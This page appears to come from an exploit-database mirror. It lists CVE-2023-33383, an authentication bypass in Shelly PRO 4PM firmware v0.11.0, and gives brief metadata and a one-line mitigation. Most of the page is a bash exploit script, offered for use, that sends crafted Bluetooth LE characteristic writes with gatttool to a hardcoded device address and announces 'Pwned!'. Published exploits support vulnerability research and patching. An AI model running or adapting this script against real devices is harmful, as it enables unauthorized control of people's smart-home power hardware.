header-logo
Suggest Exploit
vendor:
Shelly PRO 4PM
by:
The Security Team
5.3
CVSS
MEDIUM
Authentication Bypass
287
CWE
Product Name: Shelly PRO 4PM
Affected Version From: Firmware v0.11.0
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2023-33383
CPE: o:shelly:shelly_pro_4pm_firmware:0.11.0
Metasploit:
Other Scripts:
Platforms Tested: MacOS/Linux
2023

Shelly PRO 4PM v0.11.0 – Authentication Bypass

This exploit allows an attacker to bypass authentication on Shelly PRO 4PM devices with firmware version v0.11.0. By sending specific payloads, the attacker can gain unauthorized access to the device.

Mitigation:

Update the firmware to a version that addresses the authentication bypass vulnerability.
Source

Exploit-DB raw data:

#!/bin/bash

# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383

IFS=
failed=$false
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
substring="Connection refused"


banner()
    {
        clear
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
        echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
    }

banner
read -s -n 1 key
if [ "$key" = "x" ]; then
    exit 0;
elif [ "$key" = "" ]; then
    gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
    if [ -z "$gattout" ]; then
        echo -e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
    sleep 1
    if [ $? -eq 1 ]; then
       $failed=$true
       exit 0;
    fi
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
    sleep 1
    if [ $? -eq 1 ]; then
        $failed=$true
        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
        exit 0;
    else
       sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
       sleep 1
       for i in {1..5}
       do
          echo -ne "${GREEN}."
          sleep 1
       done
       echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
    fi
fi
fi

Navigation

Suggest Exploit

Services By CQR